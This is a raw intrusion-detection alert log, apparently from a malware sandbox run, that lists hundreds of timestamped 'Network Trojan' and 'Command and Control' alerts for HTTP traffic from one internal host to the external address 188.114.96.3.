                2024-09-25T15:30:00.558633+020020243181Malware Command and Control Activity Detected192.168.2.455965188.114.96.380TCP
                2024-09-25T15:30:01.627418+020020243181Malware Command and Control Activity Detected192.168.2.455966188.114.96.380TCP
                2024-09-25T15:30:02.596189+020020243181Malware Command and Control Activity Detected192.168.2.455967188.114.96.380TCP
                2024-09-25T15:30:03.523662+020020243181Malware Command and Control Activity Detected192.168.2.455968188.114.96.380TCP
                2024-09-25T15:30:05.068828+020020243181Malware Command and Control Activity Detected192.168.2.455969188.114.96.380TCP
                2024-09-25T15:30:06.054434+020020243181Malware Command and Control Activity Detected192.168.2.455970188.114.96.380TCP
                2024-09-25T15:30:07.461247+020020243181Malware Command and Control Activity Detected192.168.2.455971188.114.96.380TCP
                2024-09-25T15:30:08.370283+020020243181Malware Command and Control Activity Detected192.168.2.455972188.114.96.380TCP
                2024-09-25T15:30:09.181372+020020243181Malware Command and Control Activity Detected192.168.2.455973188.114.96.380TCP
                2024-09-25T15:30:10.051609+020020243181Malware Command and Control Activity Detected192.168.2.455974188.114.96.380TCP
                2024-09-25T15:30:10.861804+020020243181Malware Command and Control Activity Detected192.168.2.455975188.114.96.380TCP
                2024-09-25T15:30:12.048794+020020243181Malware Command and Control Activity Detected192.168.2.455976188.114.96.380TCP
                2024-09-25T15:30:12.921894+020020243181Malware Command and Control Activity Detected192.168.2.455977188.114.96.380TCP
                2024-09-25T15:30:13.839050+020020243181Malware Command and Control Activity Detected192.168.2.455978188.114.96.380TCP
                2024-09-25T15:30:14.665373+020020243181Malware Command and Control Activity Detected192.168.2.455979188.114.96.380TCP
                2024-09-25T15:30:15.525637+020020243181Malware Command and Control Activity Detected192.168.2.455980188.114.96.380TCP
                2024-09-25T15:30:16.351549+020020243181Malware Command and Control Activity Detected192.168.2.455981188.114.96.380TCP
                2024-09-25T15:30:17.330144+020020243181Malware Command and Control Activity Detected192.168.2.455982188.114.96.380TCP
                2024-09-25T15:30:18.191485+020020243181Malware Command and Control Activity Detected192.168.2.455983188.114.96.380TCP
                2024-09-25T15:30:19.039902+020020243181Malware Command and Control Activity Detected192.168.2.455984188.114.96.380TCP
                2024-09-25T15:30:19.925798+020020243181Malware Command and Control Activity Detected192.168.2.455985188.114.96.380TCP
                2024-09-25T15:30:21.355002+020020243181Malware Command and Control Activity Detected192.168.2.455986188.114.96.380TCP
                2024-09-25T15:30:22.975845+020020243181Malware Command and Control Activity Detected192.168.2.455987188.114.96.380TCP
                2024-09-25T15:30:24.171451+020020243181Malware Command and Control Activity Detected192.168.2.455988188.114.96.380TCP
                2024-09-25T15:30:25.134380+020020243181Malware Command and Control Activity Detected192.168.2.455989188.114.96.380TCP
                2024-09-25T15:30:26.009752+020020243181Malware Command and Control Activity Detected192.168.2.455990188.114.96.380TCP
                2024-09-25T15:30:26.831403+020020243181Malware Command and Control Activity Detected192.168.2.455991188.114.96.380TCP
                2024-09-25T15:30:27.738071+020020243181Malware Command and Control Activity Detected192.168.2.455992188.114.96.380TCP
                2024-09-25T15:30:28.608409+020020243181Malware Command and Control Activity Detected192.168.2.455993188.114.96.380TCP
                2024-09-25T15:30:29.440258+020020243181Malware Command and Control Activity Detected192.168.2.455994188.114.96.380TCP
                2024-09-25T15:30:30.271298+020020243181Malware Command and Control Activity Detected192.168.2.455995188.114.96.380TCP
                2024-09-25T15:30:31.121473+020020243181Malware Command and Control Activity Detected192.168.2.455996188.114.96.380TCP
                2024-09-25T15:30:31.982949+020020243181Malware Command and Control Activity Detected192.168.2.455997188.114.96.380TCP
                2024-09-25T15:30:32.891448+020020243181Malware Command and Control Activity Detected192.168.2.455998188.114.96.380TCP
                2024-09-25T15:30:33.917047+020020243181Malware Command and Control Activity Detected192.168.2.455999188.114.96.380TCP
                2024-09-25T15:30:35.635959+020020243181Malware Command and Control Activity Detected192.168.2.456000188.114.96.380TCP
                2024-09-25T15:30:36.512575+020020243181Malware Command and Control Activity Detected192.168.2.456001188.114.96.380TCP
                2024-09-25T15:30:38.532750+020020243181Malware Command and Control Activity Detected192.168.2.456002188.114.96.380TCP
                2024-09-25T15:30:39.444328+020020243181Malware Command and Control Activity Detected192.168.2.456003188.114.96.380TCP
                2024-09-25T15:30:40.283415+020020243181Malware Command and Control Activity Detected192.168.2.456004188.114.96.380TCP
                2024-09-25T15:30:41.170973+020020243181Malware Command and Control Activity Detected192.168.2.456005188.114.96.380TCP
                2024-09-25T15:30:42.064291+020020243181Malware Command and Control Activity Detected192.168.2.456006188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:36.808752+020020216411A Network Trojan was detected192.168.2.449730188.114.96.380TCP
                2024-09-25T15:28:37.787248+020020216411A Network Trojan was detected192.168.2.449731188.114.96.380TCP
                2024-09-25T15:28:38.549981+020020216411A Network Trojan was detected192.168.2.449732188.114.96.380TCP
                2024-09-25T15:28:39.422340+020020216411A Network Trojan was detected192.168.2.449733188.114.96.380TCP
                2024-09-25T15:28:40.334278+020020216411A Network Trojan was detected192.168.2.449734188.114.96.380TCP
                2024-09-25T15:28:41.272883+020020216411A Network Trojan was detected192.168.2.449735188.114.96.380TCP
                2024-09-25T15:28:42.154915+020020216411A Network Trojan was detected192.168.2.449736188.114.96.380TCP
                2024-09-25T15:28:43.005872+020020216411A Network Trojan was detected192.168.2.449737188.114.96.380TCP
                2024-09-25T15:28:44.024460+020020216411A Network Trojan was detected192.168.2.449738188.114.96.380TCP
                2024-09-25T15:28:44.864953+020020216411A Network Trojan was detected192.168.2.449739188.114.96.380TCP
                2024-09-25T15:28:45.794467+020020216411A Network Trojan was detected192.168.2.449740188.114.96.380TCP
                2024-09-25T15:28:46.586604+020020216411A Network Trojan was detected192.168.2.449741188.114.96.380TCP
                2024-09-25T15:28:47.459806+020020216411A Network Trojan was detected192.168.2.449743188.114.96.380TCP
                2024-09-25T15:28:48.329147+020020216411A Network Trojan was detected192.168.2.449745188.114.96.380TCP
                2024-09-25T15:28:49.199142+020020216411A Network Trojan was detected192.168.2.449747188.114.96.380TCP
                2024-09-25T15:28:50.188831+020020216411A Network Trojan was detected192.168.2.449749188.114.96.380TCP
                2024-09-25T15:28:51.102415+020020216411A Network Trojan was detected192.168.2.455890188.114.96.380TCP
                2024-09-25T15:28:51.992772+020020216411A Network Trojan was detected192.168.2.455892188.114.96.380TCP
                2024-09-25T15:28:52.881678+020020216411A Network Trojan was detected192.168.2.455893188.114.96.380TCP
                2024-09-25T15:28:53.727656+020020216411A Network Trojan was detected192.168.2.455894188.114.96.380TCP
                2024-09-25T15:28:54.537764+020020216411A Network Trojan was detected192.168.2.455895188.114.96.380TCP
                2024-09-25T15:28:55.513579+020020216411A Network Trojan was detected192.168.2.455896188.114.96.380TCP
                2024-09-25T15:28:56.412404+020020216411A Network Trojan was detected192.168.2.455897188.114.96.380TCP
                2024-09-25T15:28:57.598723+020020216411A Network Trojan was detected192.168.2.455898188.114.96.380TCP
                2024-09-25T15:28:58.474678+020020216411A Network Trojan was detected192.168.2.455899188.114.96.380TCP
                2024-09-25T15:28:59.484196+020020216411A Network Trojan was detected192.168.2.455900188.114.96.380TCP
                2024-09-25T15:29:00.473536+020020216411A Network Trojan was detected192.168.2.455901188.114.96.380TCP
                2024-09-25T15:29:01.372433+020020216411A Network Trojan was detected192.168.2.455902188.114.96.380TCP
                2024-09-25T15:29:02.239881+020020216411A Network Trojan was detected192.168.2.455903188.114.96.380TCP
                2024-09-25T15:29:03.276280+020020216411A Network Trojan was detected192.168.2.455904188.114.96.380TCP
                2024-09-25T15:29:04.099861+020020216411A Network Trojan was detected192.168.2.455905188.114.96.380TCP
                2024-09-25T15:29:04.914672+020020216411A Network Trojan was detected192.168.2.455906188.114.96.380TCP
                2024-09-25T15:29:05.723093+020020216411A Network Trojan was detected192.168.2.455907188.114.96.380TCP
                2024-09-25T15:29:06.587971+020020216411A Network Trojan was detected192.168.2.455908188.114.96.380TCP
                2024-09-25T15:29:07.449997+020020216411A Network Trojan was detected192.168.2.455909188.114.96.380TCP
                2024-09-25T15:29:08.319578+020020216411A Network Trojan was detected192.168.2.455910188.114.96.380TCP
                2024-09-25T15:29:09.181026+020020216411A Network Trojan was detected192.168.2.455911188.114.96.380TCP
                2024-09-25T15:29:10.039622+020020216411A Network Trojan was detected192.168.2.455912188.114.96.380TCP
                2024-09-25T15:29:10.892410+020020216411A Network Trojan was detected192.168.2.455913188.114.96.380TCP
                2024-09-25T15:29:11.755447+020020216411A Network Trojan was detected192.168.2.455914188.114.96.380TCP
                2024-09-25T15:29:12.608011+020020216411A Network Trojan was detected192.168.2.455915188.114.96.380TCP
                2024-09-25T15:29:13.487014+020020216411A Network Trojan was detected192.168.2.455916188.114.96.380TCP
                2024-09-25T15:29:14.457362+020020216411A Network Trojan was detected192.168.2.455917188.114.96.380TCP
                2024-09-25T15:29:15.345683+020020216411A Network Trojan was detected192.168.2.455918188.114.96.380TCP
                2024-09-25T15:29:16.357807+020020216411A Network Trojan was detected192.168.2.455919188.114.96.380TCP
                2024-09-25T15:29:17.230322+020020216411A Network Trojan was detected192.168.2.455920188.114.96.380TCP
                2024-09-25T15:29:18.111648+020020216411A Network Trojan was detected192.168.2.455921188.114.96.380TCP
                2024-09-25T15:29:18.948583+020020216411A Network Trojan was detected192.168.2.455922188.114.96.380TCP
                2024-09-25T15:29:19.785848+020020216411A Network Trojan was detected192.168.2.455923188.114.96.380TCP
                2024-09-25T15:29:20.658125+020020216411A Network Trojan was detected192.168.2.455924188.114.96.380TCP
                2024-09-25T15:29:21.877333+020020216411A Network Trojan was detected192.168.2.455925188.114.96.380TCP
                2024-09-25T15:29:22.966391+020020216411A Network Trojan was detected192.168.2.455926188.114.96.380TCP
                2024-09-25T15:29:23.928498+020020216411A Network Trojan was detected192.168.2.455927188.114.96.380TCP
                2024-09-25T15:29:24.921645+020020216411A Network Trojan was detected192.168.2.455928188.114.96.380TCP
                2024-09-25T15:29:27.055675+020020216411A Network Trojan was detected192.168.2.455929188.114.96.380TCP
                2024-09-25T15:29:27.870221+020020216411A Network Trojan was detected192.168.2.455931188.114.96.380TCP
                2024-09-25T15:29:28.942773+020020216411A Network Trojan was detected192.168.2.455932188.114.96.380TCP
                2024-09-25T15:29:29.777253+020020216411A Network Trojan was detected192.168.2.455933188.114.96.380TCP
                2024-09-25T15:29:30.591674+020020216411A Network Trojan was detected192.168.2.455934188.114.96.380TCP
                2024-09-25T15:29:31.906770+020020216411A Network Trojan was detected192.168.2.455935188.114.96.380TCP
                2024-09-25T15:29:32.797954+020020216411A Network Trojan was detected192.168.2.455936188.114.96.380TCP
                2024-09-25T15:29:33.663752+020020216411A Network Trojan was detected192.168.2.455937188.114.96.380TCP
                2024-09-25T15:29:34.519787+020020216411A Network Trojan was detected192.168.2.455938188.114.96.380TCP
                2024-09-25T15:29:35.353459+020020216411A Network Trojan was detected192.168.2.455939188.114.96.380TCP
                2024-09-25T15:29:36.192350+020020216411A Network Trojan was detected192.168.2.455940188.114.96.380TCP
                2024-09-25T15:29:37.117852+020020216411A Network Trojan was detected192.168.2.455941188.114.96.380TCP
                2024-09-25T15:29:38.099928+020020216411A Network Trojan was detected192.168.2.455942188.114.96.380TCP
                2024-09-25T15:29:39.059740+020020216411A Network Trojan was detected192.168.2.455943188.114.96.380TCP
                2024-09-25T15:29:39.928784+020020216411A Network Trojan was detected192.168.2.455944188.114.96.380TCP
                2024-09-25T15:29:40.808147+020020216411A Network Trojan was detected192.168.2.455945188.114.96.380TCP
                2024-09-25T15:29:41.638243+020020216411A Network Trojan was detected192.168.2.455946188.114.96.380TCP
                2024-09-25T15:29:42.475611+020020216411A Network Trojan was detected192.168.2.455947188.114.96.380TCP
                2024-09-25T15:29:43.324953+020020216411A Network Trojan was detected192.168.2.455948188.114.96.380TCP
                2024-09-25T15:29:44.263622+020020216411A Network Trojan was detected192.168.2.455949188.114.96.380TCP
                2024-09-25T15:29:45.374185+020020216411A Network Trojan was detected192.168.2.455950188.114.96.380TCP
                2024-09-25T15:29:46.306365+020020216411A Network Trojan was detected192.168.2.455951188.114.96.380TCP
                2024-09-25T15:29:47.360807+020020216411A Network Trojan was detected192.168.2.455952188.114.96.380TCP
                2024-09-25T15:29:48.414802+020020216411A Network Trojan was detected192.168.2.455953188.114.96.380TCP
                2024-09-25T15:29:49.677411+020020216411A Network Trojan was detected192.168.2.455954188.114.96.380TCP
                2024-09-25T15:29:50.524174+020020216411A Network Trojan was detected192.168.2.455955188.114.96.380TCP
                2024-09-25T15:29:51.428232+020020216411A Network Trojan was detected192.168.2.455956188.114.96.380TCP
                2024-09-25T15:29:52.541643+020020216411A Network Trojan was detected192.168.2.455957188.114.96.380TCP
                2024-09-25T15:29:53.383135+020020216411A Network Trojan was detected192.168.2.455958188.114.96.380TCP
                2024-09-25T15:29:54.258505+020020216411A Network Trojan was detected192.168.2.455959188.114.96.380TCP
                2024-09-25T15:29:55.425796+020020216411A Network Trojan was detected192.168.2.455960188.114.96.380TCP
                2024-09-25T15:29:56.224619+020020216411A Network Trojan was detected192.168.2.455961188.114.96.380TCP
                2024-09-25T15:29:57.052272+020020216411A Network Trojan was detected192.168.2.455962188.114.96.380TCP
                2024-09-25T15:29:58.164945+020020216411A Network Trojan was detected192.168.2.455963188.114.96.380TCP
                2024-09-25T15:29:58.987927+020020216411A Network Trojan was detected192.168.2.455964188.114.96.380TCP
                2024-09-25T15:29:59.835835+020020216411A Network Trojan was detected192.168.2.455965188.114.96.380TCP
                2024-09-25T15:30:00.716018+020020216411A Network Trojan was detected192.168.2.455966188.114.96.380TCP
                2024-09-25T15:30:01.920768+020020216411A Network Trojan was detected192.168.2.455967188.114.96.380TCP
                2024-09-25T15:30:02.761283+020020216411A Network Trojan was detected192.168.2.455968188.114.96.380TCP
                2024-09-25T15:30:03.946516+020020216411A Network Trojan was detected192.168.2.455969188.114.96.380TCP
                2024-09-25T15:30:05.226430+020020216411A Network Trojan was detected192.168.2.455970188.114.96.380TCP
                2024-09-25T15:30:06.440249+020020216411A Network Trojan was detected192.168.2.455971188.114.96.380TCP
                2024-09-25T15:30:07.613698+020020216411A Network Trojan was detected192.168.2.455972188.114.96.380TCP
                2024-09-25T15:30:08.520224+020020216411A Network Trojan was detected192.168.2.455973188.114.96.380TCP
                2024-09-25T15:30:09.339418+020020216411A Network Trojan was detected192.168.2.455974188.114.96.380TCP
                2024-09-25T15:30:10.220925+020020216411A Network Trojan was detected192.168.2.455975188.114.96.380TCP
                2024-09-25T15:30:11.026164+020020216411A Network Trojan was detected192.168.2.455976188.114.96.380TCP
                2024-09-25T15:30:12.218161+020020216411A Network Trojan was detected192.168.2.455977188.114.96.380TCP
                2024-09-25T15:30:13.173782+020020216411A Network Trojan was detected192.168.2.455978188.114.96.380TCP
                2024-09-25T15:30:13.993423+020020216411A Network Trojan was detected192.168.2.455979188.114.96.380TCP
                2024-09-25T15:30:14.842547+020020216411A Network Trojan was detected192.168.2.455980188.114.96.380TCP
                2024-09-25T15:30:15.691270+020020216411A Network Trojan was detected192.168.2.455981188.114.96.380TCP
                2024-09-25T15:30:16.551798+020020216411A Network Trojan was detected192.168.2.455982188.114.96.380TCP
                2024-09-25T15:30:17.497860+020020216411A Network Trojan was detected192.168.2.455983188.114.96.380TCP
                2024-09-25T15:30:18.363198+020020216411A Network Trojan was detected192.168.2.455984188.114.96.380TCP
                2024-09-25T15:30:19.199856+020020216411A Network Trojan was detected192.168.2.455985188.114.96.380TCP
                2024-09-25T15:30:20.095708+020020216411A Network Trojan was detected192.168.2.455986188.114.96.380TCP
                2024-09-25T15:30:21.507011+020020216411A Network Trojan was detected192.168.2.455987188.114.96.380TCP
                2024-09-25T15:30:23.134473+020020216411A Network Trojan was detected192.168.2.455988188.114.96.380TCP
                2024-09-25T15:30:24.350366+020020216411A Network Trojan was detected192.168.2.455989188.114.96.380TCP
                2024-09-25T15:30:25.290428+020020216411A Network Trojan was detected192.168.2.455990188.114.96.380TCP
                2024-09-25T15:30:26.169979+020020216411A Network Trojan was detected192.168.2.455991188.114.96.380TCP
                2024-09-25T15:30:27.001129+020020216411A Network Trojan was detected192.168.2.455992188.114.96.380TCP
                2024-09-25T15:30:27.899264+020020216411A Network Trojan was detected192.168.2.455993188.114.96.380TCP
                2024-09-25T15:30:28.753857+020020216411A Network Trojan was detected192.168.2.455994188.114.96.380TCP
                2024-09-25T15:30:29.618078+020020216411A Network Trojan was detected192.168.2.455995188.114.96.380TCP
                2024-09-25T15:30:30.428677+020020216411A Network Trojan was detected192.168.2.455996188.114.96.380TCP
                2024-09-25T15:30:31.273028+020020216411A Network Trojan was detected192.168.2.455997188.114.96.380TCP
                2024-09-25T15:30:32.135559+020020216411A Network Trojan was detected192.168.2.455998188.114.96.380TCP
                2024-09-25T15:30:33.256022+020020216411A Network Trojan was detected192.168.2.455999188.114.96.380TCP
                2024-09-25T15:30:34.073488+020020216411A Network Trojan was detected192.168.2.456000188.114.96.380TCP
                2024-09-25T15:30:35.801198+020020216411A Network Trojan was detected192.168.2.456001188.114.96.380TCP
                2024-09-25T15:30:37.771542+020020216411A Network Trojan was detected192.168.2.456002188.114.96.380TCP
                2024-09-25T15:30:38.713862+020020216411A Network Trojan was detected192.168.2.456003188.114.96.380TCP
                2024-09-25T15:30:39.594556+020020216411A Network Trojan was detected192.168.2.456004188.114.96.380TCP
                2024-09-25T15:30:40.433961+020020216411A Network Trojan was detected192.168.2.456005188.114.96.380TCP
                2024-09-25T15:30:41.413983+020020216411A Network Trojan was detected192.168.2.456006188.114.96.380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T15:28:36.808752+020028257661Malware Command and Control Activity Detected192.168.2.449730188.114.96.380TCP
                2024-09-25T15:28:37.787248+020028257661Malware Command and Control Activity Detected192.168.2.449731188.114.96.380TCP
                2024-09-25T15:28:38.549981+020028257661Malware Command and Control Activity Detected192.168.2.449732188.114.96.380TCP
                2024-09-25T15:28:39.422340+020028257661Malware Command and Control Activity Detected192.168.2.449733188.114.96.380TCP
                2024-09-25T15:28:40.334278+020028257661Malware Command and Control Activity Detected192.168.2.449734188.114.96.380TCP
                2024-09-25T15:28:41.272883+020028257661Malware Command and Control Activity Detected192.168.2.449735188.114.96.380TCP
                2024-09-25T15:28:42.154915+020028257661Malware Command and Control Activity Detected192.168.2.449736188.114.96.380TCP
                2024-09-25T15:28:43.005872+020028257661Malware Command and Control Activity Detected192.168.2.449737188.114.96.380TCP
                2024-09-25T15:28:44.024460+020028257661Malware Command and Control Activity Detected192.168.2.449738188.114.96.380TCP
                2024-09-25T15:28:44.864953+020028257661Malware Command and Control Activity Detected192.168.2.449739188.114.96.380TCP
                2024-09-25T15:28:45.794467+020028257661Malware Command and Control Activity Detected192.168.2.449740188.114.96.380TCP
                2024-09-25T15:28:46.586604+020028257661Malware Command and Control Activity Detected192.168.2.449741188.114.96.380TCP
                2024-09-25T15:28:47.459806+020028257661Malware Command and Control Activity Detected192.168.2.449743188.114.96.380TCP
                2024-09-25T15:28:48.329147+020028257661Malware Command and Control Activity Detected192.168.2.449745188.114.96.380TCP
                2024-09-25T15:28:49.199142+020028257661Malware Command and Control Activity Detected192.168.2.449747188.114.96.380TCP
                2024-09-25T15:28:50.188831+020028257661Malware Command and Control Activity Detected192.168.2.449749188.114.96.380TCP
                2024-09-25T15:28:51.102415+020028257661Malware Command and Control Activity Detected192.168.2.455890188.114.96.380TCP
                2024-09-25T15:28:51.992772+020028257661Malware Command and Control Activity Detected192.168.2.455892188.114.96.380TCP
                2024-09-25T15:28:52.881678+020028257661Malware Command and Control Activity Detected192.168.2.455893188.114.96.380TCP
                2024-09-25T15:28:53.727656+020028257661Malware Command and Control Activity Detected192.168.2.455894188.114.96.380TCP
                2024-09-25T15:28:54.537764+020028257661Malware Command and Control Activity Detected192.168.2.455895188.114.96.380TCP
                2024-09-25T15:28:55.513579+020028257661Malware Command and Control Activity Detected192.168.2.455896188.114.96.380TCP
                2024-09-25T15:28:56.412404+020028257661Malware Command and Control Activity Detected192.168.2.455897188.114.96.380TCP
                2024-09-25T15:28:57.598723+020028257661Malware Command and Control Activity Detected192.168.2.455898188.114.96.380TCP
                2024-09-25T15:28:58.474678+020028257661Malware Command and Control Activity Detected192.168.2.455899188.114.96.380TCP
                2024-09-25T15:28:59.484196+020028257661Malware Command and Control Activity Detected192.168.2.455900188.114.96.380TCP
                2024-09-25T15:29:00.473536+020028257661Malware Command and Control Activity Detected192.168.2.455901188.114.96.380TCP
                2024-09-25T15:29:01.372433+020028257661Malware Command and Control Activity Detected192.168.2.455902188.114.96.380TCP
                2024-09-25T15:29:02.239881+020028257661Malware Command and Control Activity Detected192.168.2.455903188.114.96.380TCP
                2024-09-25T15:29:03.276280+020028257661Malware Command and Control Activity Detected192.168.2.455904188.114.96.380TCP
                2024-09-25T15:29:04.099861+020028257661Malware Command and Control Activity Detected192.168.2.455905188.114.96.380TCP
                2024-09-25T15:29:04.914672+020028257661Malware Command and Control Activity Detected192.168.2.455906188.114.96.380TCP
                2024-09-25T15:29:05.723093+020028257661Malware Command and Control Activity Detected192.168.2.455907188.114.96.380TCP
                2024-09-25T15:29:06.587971+020028257661Malware Command and Control Activity Detected192.168.2.455908188.114.96.380TCP
                2024-09-25T15:29:07.449997+020028257661Malware Command and Control Activity Detected192.168.2.455909188.114.96.380TCP
                2024-09-25T15:29:08.319578+020028257661Malware Command and Control Activity Detected192.168.2.455910188.114.96.380TCP
                2024-09-25T15:29:09.181026+020028257661Malware Command and Control Activity Detected192.168.2.455911188.114.96.380TCP
                2024-09-25T15:29:10.039622+020028257661Malware Command and Control Activity Detected192.168.2.455912188.114.96.380TCP
                2024-09-25T15:29:10.892410+020028257661Malware Command and Control Activity Detected192.168.2.455913188.114.96.380TCP
                2024-09-25T15:29:11.755447+020028257661Malware Command and Control Activity Detected192.168.2.455914188.114.96.380TCP
                2024-09-25T15:29:12.608011+020028257661Malware Command and Control Activity Detected192.168.2.455915188.114.96.380TCP
                2024-09-25T15:29:13.487014+020028257661Malware Command and Control Activity Detected192.168.2.455916188.114.96.380TCP
                2024-09-25T15:29:14.457362+020028257661Malware Command and Control Activity Detected192.168.2.455917188.114.96.380TCP
                2024-09-25T15:29:15.345683+020028257661Malware Command and Control Activity Detected192.168.2.455918188.114.96.380TCP
                2024-09-25T15:29:16.357807+020028257661Malware Command and Control Activity Detected192.168.2.455919188.114.96.380TCP
                2024-09-25T15:29:17.230322+020028257661Malware Command and Control Activity Detected192.168.2.455920188.114.96.380TCP
                2024-09-25T15:29:18.111648+020028257661Malware Command and Control Activity Detected192.168.2.455921188.114.96.380TCP
                2024-09-25T15:29:18.948583+020028257661Malware Command and Control Activity Detected192.168.2.455922188.114.96.380TCP
                2024-09-25T15:29:19.785848+020028257661Malware Command and Control Activity Detected192.168.2.455923188.114.96.380TCP
                2024-09-25T15:29:20.658125+020028257661Malware Command and Control Activity Detected192.168.2.455924188.114.96.380TCP
                2024-09-25T15:29:21.877333+020028257661Malware Command and Control Activity Detected192.168.2.455925188.114.96.380TCP
                2024-09-25T15:29:22.966391+020028257661Malware Command and Control Activity Detected192.168.2.455926188.114.96.380TCP
                2024-09-25T15:29:23.928498+020028257661Malware Command and Control Activity Detected192.168.2.455927188.114.96.380TCP
                2024-09-25T15:29:24.921645+020028257661Malware Command and Control Activity Detected192.168.2.455928188.114.96.380TCP
                2024-09-25T15:29:27.055675+020028257661Malware Command and Control Activity Detected192.168.2.455929188.114.96.380TCP
                2024-09-25T15:29:27.870221+020028257661Malware Command and Control Activity Detected192.168.2.455931188.114.96.380TCP
                2024-09-25T15:29:28.942773+020028257661Malware Command and Control Activity Detected192.168.2.455932188.114.96.380TCP
                2024-09-25T15:29:29.777253+020028257661Malware Command and Control Activity Detected192.168.2.455933188.114.96.380TCP
                2024-09-25T15:29:30.591674+020028257661Malware Command and Control Activity Detected192.168.2.455934188.114.96.380TCP
                2024-09-25T15:29:31.906770+020028257661Malware Command and Control Activity Detected192.168.2.455935188.114.96.380TCP
                2024-09-25T15:29:32.797954+020028257661Malware Command and Control Activity Detected192.168.2.455936188.114.96.380TCP
                2024-09-25T15:29:33.663752+020028257661Malware Command and Control Activity Detected192.168.2.455937188.114.96.380TCP
                2024-09-25T15:29:34.519787+020028257661Malware Command and Control Activity Detected192.168.2.455938188.114.96.380TCP
                2024-09-25T15:29:35.353459+020028257661Malware Command and Control Activity Detected192.168.2.455939188.114.96.380TCP
                2024-09-25T15:29:36.192350+020028257661Malware Command and Control Activity Detected192.168.2.455940188.114.96.380TCP
                2024-09-25T15:29:37.117852+020028257661Malware Command and Control Activity Detected192.168.2.455941188.114.96.380TCP
                2024-09-25T15:29:38.099928+020028257661Malware Command and Control Activity Detected192.168.2.455942188.114.96.380TCP
                2024-09-25T15:29:39.059740+020028257661Malware Command and Control Activity Detected192.168.2.455943188.114.96.380TCP
                2024-09-25T15:29:39.928784+020028257661Malware Command and Control Activity Detected192.168.2.455944188.114.96.380TCP
                2024-09-25T15:29:40.808147+020028257661Malware Command and Control Activity Detected192.168.2.455945188.114.96.380TCP
                2024-09-25T15:29:41.638243+020028257661Malware Command and Control Activity Detected192.168.2.455946188.114.96.380TCP
                2024-09-25T15:29:42.475611+020028257661Malware Command and Control Activity Detected192.168.2.455947188.114.96.380TCP
                2024-09-25T15:29:43.324953+020028257661Malware Command and Control Activity Detected192.168.2.455948188.114.96.380TCP
                2024-09-25T15:29:44.263622+020028257661Malware Command and Control Activity Detected192.168.2.455949188.114.96.380TCP
                2024-09-25T15:29:45.374185+020028257661Malware Command and Control Activity Detected192.168.2.455950188.114.96.380TCP
                2024-09-25T15:29:46.306365+020028257661Malware Command and Control Activity Detected192.168.2.455951188.114.96.380TCP
                2024-09-25T15:29:47.360807+020028257661Malware Command and Control Activity Detected192.168.2.455952188.114.96.380TCP
                2024-09-25T15:29:48.414802+020028257661Malware Command and Control Activity Detected192.168.2.455953188.114.96.380TCP
                2024-09-25T15:29:49.677411+020028257661Malware Command and Control Activity Detected192.168.2.455954188.114.96.380TCP
                2024-09-25T15:29:50.524174+020028257661Malware Command and Control Activity Detected192.168.2.455955188.114.96.380TCP
                2024-09-25T15:29:51.428232+020028257661Malware Command and Control Activity Detected192.168.2.455956188.114.96.380TCP
                2024-09-25T15:29:52.541643+020028257661Malware Command and Control Activity Detected192.168.2.455957188.114.96.380TCP
                2024-09-25T15:29:53.383135+020028257661Malware Command and Control Activity Detected192.168.2.455958188.114.96.380TCP
                2024-09-25T15:29:54.258505+020028257661Malware Command and Control Activity Detected192.168.2.455959188.114.96.380TCP
                2024-09-25T15:29:55.425796+020028257661Malware Command and Control Activity Detected192.168.2.455960188.114.96.380TCP
                2024-09-25T15:29:56.224619+020028257661Malware Command and Control Activity Detected192.168.2.455961188.114.96.380TCP
                2024-09-25T15:29:57.052272+020028257661Malware Command and Control Activity Detected192.168.2.455962188.114.96.380TCP
                2024-09-25T15:29:58.164945+020028257661Malware Command and Control Activity Detected192.168.2.455963188.114.96.380TCP
                2024-09-25T15:29:58.987927+020028257661Malware Command and Control Activity Detected192.168.2.455964188.114.96.380TCP
                2024-09-25T15:29:59.835835+020028257661Malware Command and Control Activity Detected192.168.2.455965188.114.96.380TCP
                2024-09-25T15:30:00.716018+020028257661Malware Command and Control Activity Detected192.168.2.455966188.114.96.380TCP
                2024-09-25T15:30:01.920768+020028257661Malware Command and Control Activity Detected192.168.2.455967188.114.96.380TCP
                2024-09-25T15:30:02.761283+020028257661Malware Command and Control Activity Detected192.168.2.455968188.114.96.380TCP
                2024-09-25T15:30:03.946516+020028257661Malware Command and Control Activity Detected192.168.2.455969188.114.96.380TCP
                2024-09-25T15:30:05.226430+020028257661Malware Command and Control Activity Detected192.168.2.455970188.114.96.380TCP
                2024-09-25T15:30:06.440249+020028257661Malware Command and Control Activity Detected192.168.2.455971188.114.96.380TCP
                2024-09-25T15:30:07.613698+020028257661Malware Command and Control Activity Detected192.168.2.455972188.114.96.380TCP
                2024-09-25T15:30:08.520224+020028257661Malware Command and Control Activity Detected192.168.2.455973188.114.96.380TCP
                2024-09-25T15:30:09.339418+020028257661Malware Command and Control Activity Detected192.168.2.455974188.114.96.380TCP
                2024-09-25T15:30:10.220925+020028257661Malware Command and Control Activity Detected192.168.2.455975188.114.96.380TCP
                2024-09-25T15:30:11.026164+020028257661Malware Command and Control Activity Detected192.168.2.455976188.114.96.380TCP
                2024-09-25T15:30:12.218161+020028257661Malware Command and Control Activity Detected192.168.2.455977188.114.96.380TCP
                2024-09-25T15:30:13.173782+020028257661Malware Command and Control Activity Detected192.168.2.455978188.114.96.380TCP
                2024-09-25T15:30:13.993423+020028257661Malware Command and Control Activity Detected192.168.2.455979188.114.96.380TCP
                2024-09-25T15:30:14.842547+020028257661Malware Command and Control Activity Detected192.168.2.455980188.114.96.380TCP
                2024-09-25T15:30:15.691270+020028257661Malware Command and Control Activity Detected192.168.2.455981188.114.96.380TCP
                2024-09-25T15:30:16.551798+020028257661Malware Command and Control Activity Detected192.168.2.455982188.114.96.380TCP
                2024-09-25T15:30:17.497860+020028257661Malware Command and Control Activity Detected192.168.2.455983188.114.96.380TCP
                2024-09-25T15:30:18.363198+020028257661Malware Command and Control Activity Detected192.168.2.455984188.114.96.380TCP
                2024-09-25T15:30:19.199856+020028257661Malware Command and Control Activity Detected192.168.2.455985188.114.96.380TCP
                2024-09-25T15:30:20.095708+020028257661Malware Command and Control Activity Detected192.168.2.455986188.114.96.380TCP
                2024-09-25T15:30:21.507011+020028257661Malware Command and Control Activity Detected192.168.2.455987188.114.96.380TCP
                2024-09-25T15:30:23.134473+020028257661Malware Command and Control Activity Detected192.168.2.455988188.114.96.380TCP
